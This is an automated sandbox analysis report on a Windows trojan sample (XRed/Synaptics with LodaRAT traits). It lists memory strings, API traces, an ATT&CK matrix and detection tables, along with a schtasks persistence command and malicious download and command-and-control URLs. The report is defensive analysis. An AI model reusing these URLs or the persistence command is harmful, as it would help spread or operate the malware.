                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l5iw0bj8ze0ymemstr_5903b613-b
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l8xy4uj5nx0dmemstr_2f7b98ab-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s5gd9ov2tv7ngqmemstr_1bc575e7-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p6om9pl1b`qmemstr_f5aab0b2-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t8jj9ic1w}qmemstr_bf93cc42-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c6mr6dc7zr3rvqmemstr_b58cf074-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u3xq5wq2ea3msqmemstr_b11b162f-7
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v1wl4kx8zv2klqmemstr_83fcc800-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k4ha7yg1wr6giqmemstr_35b3285d-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s5gd9ov2tv7nbqmemstr_8f76b49f-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k4ha7yg1wr6g_qmemstr_d0d9adfc-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s5gd9ov2tv7nuqmemstr_f70e274f-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p6om9pl1b6g.qmemstr_e01f635e-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s5gd9ov2tv7n$qmemstr_6d2af0fd-b
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p6om9pl1b6g!qmemstr_19663e6b-4
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f5xr5ip0nk7c:qmemstr_5f75b214-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v1wl4kx8zv2k0qmemstr_31b04440-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f5xr5ip0nk7cmemstr_f1b176c7-7
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ettypenmemstr_f8d08991-b
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5ip0nk7cmemstr_9eda6dd6-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p6om9pl1bcmemstr_7f9f9894-7
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l7bm2gf1uc0mmemstr_dc38858c-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7yg1wr6gmemstr_7a8da1de-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t8jj9ic1w6gmemstr_4e6b50a9-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p6om9pl1b0dmemstr_df1788f7-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k4ha7yg1wr6gmpmemstr_65fa4710-7
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p6om9pl1bfpmemstr_d3f38cc9-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x8zv2kcpmemstr_2b27e5a6-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l7bm2gf1uc0m|pmemstr_d7817071-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l7bm2gf1uc0mrpmemstr_5c762fdd-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t8jj9ic1w0mopmemstr_7d600183-b
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l7bm2gf1uc0mhpmemstr_88740ac8-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t8jj9ic1w6g^pmemstr_e0a27925-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k4ha7yg1wr6g[pmemstr_057c53e7-b
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t8jj9ic1wqpmemstr_bddc301f-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t8jj9ic1w*pmemstr_f20a135f-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2gf1uc0m'pmemstr_ed421e93-4
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k4ha7yg1wr6g=pmemstr_93e5160f-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t8jj9ic1w0m6pmemstr_20d21c2d-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p6om9pl1bpmemstr_73537b04-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p6om9pl1brmemstr_c2c5553b-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s5gd9ov2tv7nmemstr_49ee12cc-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: inueloopmemstr_f9374ff8-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p6om9pl1bgmemstr_cca4be63-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k4ha7yg1wr6glomemstr_97b293a5-5
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001B4B52 SendInput,keybd_event,2_2_001B4B52
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001B7DD5 mouse_event,2_2_001B7DD5
                                Source: C:\Users\user\Desktop\AYRASY.exeProcess created: C:\Users\user\Desktop\._cache_AYRASY.exe "C:\Users\user\Desktop\._cache_AYRASY.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn WBHUSK.exe /tr C:\Users\user\AppData\Roaming\Windata\YOABSG.exe /sc minute /mo 1Jump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001AB398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,2_2_001AB398
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001ABE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,2_2_001ABE31
                                Source: ._cache_AYRASY.exe, YOABSG.exeBinary or memory string: Shell_TrayWnd
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp, YOABSG.exe, 00000009.00000002.2260984456.0000000000A5E000.00000040.00000001.01000000.00000009.sdmp, YOABSG.exe, 0000000C.00000002.2290673125.0000000000A5E000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_00197254 cpuid 2_2_00197254
                                Source: C:\Users\user\Desktop\AYRASY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001940DA GetSystemTimeAsFileTime,__aulldiv,2_2_001940DA
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001EC146 GetUserNameW,2_2_001EC146
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001A2C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_001A2C3C
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_0018E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_0018E47B
                                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: Amcache.hve.17.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                                Source: Amcache.hve.17.drBinary or memory string: msmpeng.exe
                                Source: Amcache.hve.17.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                                Source: Amcache.hve.17.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3412593994.0000000001446000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                Source: Amcache.hve.17.drBinary or memory string: MsMpEng.exe
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

                                Stealing of Sensitive Information

                                barindex
                                Yara detected LodaRAT
                                Source: Yara matchFile source: Process Memory Space: ._cache_AYRASY.exe PID: 6564, type: MEMORYSTR
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Yara detected XRed
                                Source: Yara matchFile source: AYRASY.exe, type: SAMPLE
                                Source: Yara matchFile source: 0.0.AYRASY.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000003.00000003.2300553454.0000000000750000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000000.2139635258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: AYRASY.exe PID: 6600, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 5048, type: MEMORYSTR
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX4413.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\Documents\GAOBCVIQIJ\~$cache1, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                Source: YOABSG.exe, 00000016.00000002.3316449153.0000000000A5E000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
                                Source: YOABSG.exe, 00000015.00000003.2703406856.0000000004905000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81
                                Source: YOABSG.exeBinary or memory string: WIN_XP
                                Source: YOABSG.exe, 00000014.00000003.2518038035.0000000004762000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81'
                                Source: YOABSG.exeBinary or memory string: WIN_XPe
                                Source: YOABSG.exe, 00000009.00000003.2215831235.000000000434D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_813
                                Source: YOABSG.exe, 00000012.00000003.2437148887.0000000004933000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_818)
                                Source: YOABSG.exeBinary or memory string: WIN_VISTA
                                Source: YOABSG.exeBinary or memory string: WIN_7
                                Source: YOABSG.exeBinary or memory string: WIN_8
                                Source: YOABSG.exe, 0000000C.00000003.2277128270.00000000047AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81x
                                Source: YOABSG.exe, 00000016.00000002.3320822835.000000000473F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81T
                                Source: Yara matchFile source: Process Memory Space: ._cache_AYRASY.exe PID: 6564, type: MEMORYSTR

                                Remote Access Functionality

                                barindex
                                Yara detected LodaRAT
                                Source: Yara matchFile source: Process Memory Space: ._cache_AYRASY.exe PID: 6564, type: MEMORYSTR
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Yara detected XRed
                                Source: Yara matchFile source: AYRASY.exe, type: SAMPLE
                                Source: Yara matchFile source: 0.0.AYRASY.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000003.00000003.2300553454.0000000000750000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000000.2139635258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: AYRASY.exe PID: 6600, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 5048, type: MEMORYSTR
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX4413.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\Documents\GAOBCVIQIJ\~$cache1, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001C91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,2_2_001C91DC
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001C96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_001C96E2
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_00A091DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,9_2_00A091DC
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_00A096E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,9_2_00A096E2

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information421
                                Scripting                                		2
                                Valid Accounts                                		11
                                Windows Management Instrumentation                                		421
                                Scripting                                		1
                                Exploitation for Privilege Escalation                                		1
                                Disable or Modify Tools                                		21
                                Input Capture                                		2
                                System Time Discovery                                		Remote Services1
                                Archive Collected Data                                		4
                                Ingress Tool Transfer                                		Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomains1
                                Replication Through Removable Media                                		2
                                Native API                                		1
                                DLL Side-Loading                                		1
                                DLL Side-Loading                                		1
                                Deobfuscate/Decode Files or Information                                		LSASS Memory1
                                Peripheral Device Discovery                                		Remote Desktop Protocol21
                                Input Capture                                		11
                                Encrypted Channel                                		Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts1
                                Scheduled Task/Job                                		2
                                Valid Accounts                                		1
                                Extra Window Memory Injection                                		21
                                Obfuscated Files or Information                                		Security Account Manager1
                                Account Discovery                                		SMB/Windows Admin Shares3
                                Clipboard Data                                		3
                                Non-Application Layer Protocol                                		Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal AccountsCron1
                                Scheduled Task/Job                                		2
                                Valid Accounts                                		1
                                Software Packing                                		NTDS4
                                File and Directory Discovery                                		Distributed Component Object ModelInput Capture34
                                Application Layer Protocol                                		Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchd21
                                Registry Run Keys / Startup Folder                                		21
                                Access Token Manipulation                                		1
                                DLL Side-Loading                                		LSA Secrets38
                                System Information Discovery                                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts12
                                Process Injection                                		1
                                Extra Window Memory Injection                                		Cached Domain Credentials271
                                Security Software Discovery                                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                                Scheduled Task/Job                                		12
                                Masquerading                                		DCSync131
                                Virtualization/Sandbox Evasion                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job21
                                Registry Run Keys / Startup Folder                                		2
                                Valid Accounts                                		Proc Filesystem3
                                Process Discovery                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt131
                                Virtualization/Sandbox Evasion                                		/etc/passwd and /etc/shadow11
                                Application Window Discovery                                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
                                Access Token Manipulation                                		Network Sniffing1
                                System Owner/User Discovery                                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd12
                                Process Injection                                		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582334 Sample: AYRASY.exe Startdate: 30/12/2024 Architecture: WINDOWS Score: 100 51 freedns.afraid.org 2->51 53 xred.mooo.com 2->53 55 2 other IPs or domains 2->55 65 Suricata IDS alerts for network traffic 2->65 67 Found malware configuration 2->67 69 Antivirus detection for URL or domain 2->69 73 18 other signatures 2->73 9 AYRASY.exe 1 6 2->9         started        12 YOABSG.exe 2->12         started        15 EXCEL.EXE 219 68 2->15         started        17 6 other processes 2->17 signatures3 71 Uses dynamic DNS services 51->71 process4 file5 43 C:\Users\user\Desktop\._cache_AYRASY.exe, PE32 9->43 dropped 45 C:\ProgramData\Synaptics\Synaptics.exe, PE32 9->45 dropped 47 C:\ProgramData\Synaptics\RCX4413.tmp, PE32 9->47 dropped 49 C:\...\Synaptics.exe:Zone.Identifier, ASCII 9->49 dropped 19 ._cache_AYRASY.exe 2 5 9->19         started        24 Synaptics.exe 30 9->24         started        87 Multi AV Scanner detection for dropped file 12->87 89 Machine Learning detection for dropped file 12->89 91 Found API chain indicative of sandbox detection 12->91 signatures6 process7 dnsIp8 57 172.111.138.100, 49759, 49850, 49923 VOXILITYGB United States 19->57 37 C:\Users\user\AppData\Roaming\...\YOABSG.exe, PE32 19->37 dropped 39 C:\Users\user\AppData\Local\Temp\WBHUSK.vbs, ASCII 19->39 dropped 75 Multi AV Scanner detection for dropped file 19->75 77 Machine Learning detection for dropped file 19->77 26 cmd.exe 1 19->26         started        29 wscript.exe 19->29         started        59 docs.google.com 142.250.186.46, 443, 49785, 49786 GOOGLEUS United States 24->59 61 drive.usercontent.google.com 172.217.23.97, 443, 49804, 49805 GOOGLEUS United States 24->61 63 freedns.afraid.org 69.42.215.252, 49796, 80 AWKNET-LLCUS United States 24->63 41 C:\Users\user\DocumentsbehaviorgraphAOBCVIQIJ\~$cache1, PE32 24->41 dropped 79 Antivirus detection for dropped file 24->79 81 Drops PE files to the document folder of the user 24->81 31 WerFault.exe 24->31         started        file9 signatures10 process11 signatures12 83 Uses schtasks.exe or at.exe to add and modify task schedules 26->83 33 conhost.exe 26->33         started        35 schtasks.exe 26->35         started        85 Windows Scripting host queries suspicious COM object (likely to drop second stage) 29->85 process13

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                AYRASY.exe92%ReversingLabsWin32.Trojan.Synaptics
                                AYRASY.exe87%VirustotalBrowse
                                AYRASY.exe100%AviraTR/Dldr.Agent.SH
                                AYRASY.exe100%AviraW2000M/Dldr.Agent.17651006
                                AYRASY.exe100%Joe Sandbox ML

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\Users\user\AppData\Local\Temp\WBHUSK.vbs100%AviraVBS/Runner.VPJI
                                C:\ProgramData\Synaptics\RCX4413.tmp100%AviraTR/Dldr.Agent.SH
                                C:\ProgramData\Synaptics\RCX4413.tmp100%AviraW2000M/Dldr.Agent.17651006
                                C:\ProgramData\Synaptics\Synaptics.exe100%AviraTR/Dldr.Agent.SH
                                C:\ProgramData\Synaptics\Synaptics.exe100%AviraW2000M/Dldr.Agent.17651006
                                C:\Users\user\Documents\GAOBCVIQIJ\~$cache1100%AviraTR/Dldr.Agent.SH
                                C:\Users\user\Documents\GAOBCVIQIJ\~$cache1100%AviraW2000M/Dldr.Agent.17651006
                                C:\Users\user\Desktop\._cache_AYRASY.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Roaming\Windata\YOABSG.exe100%Joe Sandbox ML
                                C:\ProgramData\Synaptics\RCX4413.tmp100%Joe Sandbox ML
                                C:\ProgramData\Synaptics\Synaptics.exe100%Joe Sandbox ML
                                C:\Users\user\Documents\GAOBCVIQIJ\~$cache1100%Joe Sandbox ML
                                C:\ProgramData\Synaptics\RCX4413.tmp100%ReversingLabsWin32.Worm.Zorex
                                C:\ProgramData\Synaptics\Synaptics.exe92%ReversingLabsWin32.Trojan.Synaptics
                                C:\Users\user\AppData\Roaming\Windata\YOABSG.exe47%ReversingLabsWin32.Trojan.Lisk
                                C:\Users\user\Desktop\._cache_AYRASY.exe47%ReversingLabsWin32.Trojan.Lisk
                                C:\Users\user\Documents\GAOBCVIQIJ\~$cache1100%ReversingLabsWin32.Worm.Zorex

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                No Antivirus matches

                                URLs

                                SourceDetectionScannerLabelLink
                                http://xred.site50.net/syn/SUpdate.ini0.100%Avira URL Cloudmalware
                                https://drive.userconten0%Avira URL Cloudsafe
                                http://xred.site50.net/syn/SSLLibrary.dl8100%Avira URL Cloudmalware

                                Domains and IPs

                                Contacted Domains

                                NameIPActiveMaliciousAntivirus DetectionReputation
                                freedns.afraid.org
                                		69.42.215.252
                                		truefalse
                                  		high
                                  docs.google.com
                                  		142.250.186.46
                                  		truefalse
                                    		high
                                    drive.usercontent.google.com
                                    		172.217.23.97
                                    		truefalse
                                      		high
                                      xred.mooo.com
                                      		unknown
                                      		unknownfalse
                                        		high

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        xred.mooo.comfalse
                                          		high
                                          http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978false
                                            		high

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978;XSynaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=AYRASY.exe, 00000000.00000003.2148237469.00000000022E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                		high
                                                http://xred.site50.net/syn/SUpdate.ini0.AYRASY.exe, 00000000.00000003.2148237469.00000000022E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://xred.site50.net/syn/Synaptics.rarZSynaptics.exe, 00000003.00000002.2438067396.0000000002190000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1AYRASY.exefalse
                                                    		high
                                                    https://docs.google.com/8Synaptics.exe, 00000003.00000002.2441515499.000000000557F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://docs.google.com/tySynaptics.exe, 00000003.00000002.2441515499.0000000005618000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:Synaptics.exe, 00000003.00000002.2438067396.0000000002190000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://drive.usercontenSynaptics.exe, 00000003.00000003.2356852883.000000000558B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005597000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://drive.usercontent.google.com/Synaptics.exe, 00000003.00000003.2357080869.0000000005535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://upx.sf.netAmcache.hve.17.drfalse
                                                              		high
                                                              http://xred.site50.net/syn/Synaptics.rarAYRASY.exefalse
                                                                		high
                                                                http://ip-score.com/checkip/._cache_AYRASY.exe, 00000002.00000002.3416162659.00000000046DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
